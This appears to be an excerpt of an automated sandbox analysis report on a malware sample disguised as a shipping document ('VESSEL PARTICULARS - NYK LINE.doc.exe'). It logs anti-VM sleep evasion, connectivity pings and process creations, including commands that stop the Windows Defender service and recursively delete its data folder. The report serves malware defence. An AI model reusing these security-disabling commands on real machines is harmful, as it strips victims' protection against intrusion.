                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara match File source: Process Memory Space: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 5204, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe TID: 340 Thread sleep time: -33000s >= -30000s
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe TID: 396 Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe TID: 3224 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192 Thread sleep count: 2860 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6352 Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192 Thread sleep count: 545 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6252 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6376 Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6344 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6408 Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6364 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7008 Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6944 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2860
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 545
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2802
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2598
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4968
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3977
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4042
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Process information queried: ProcessInformation
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.502968851.00000000013C3000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllers\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=SUAVTZKUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSER.
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 19_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Memory allocated: page read and write | page guard
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 19_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.facebook.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.twitter.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Process created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6200
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 1308
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Queries volume information: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
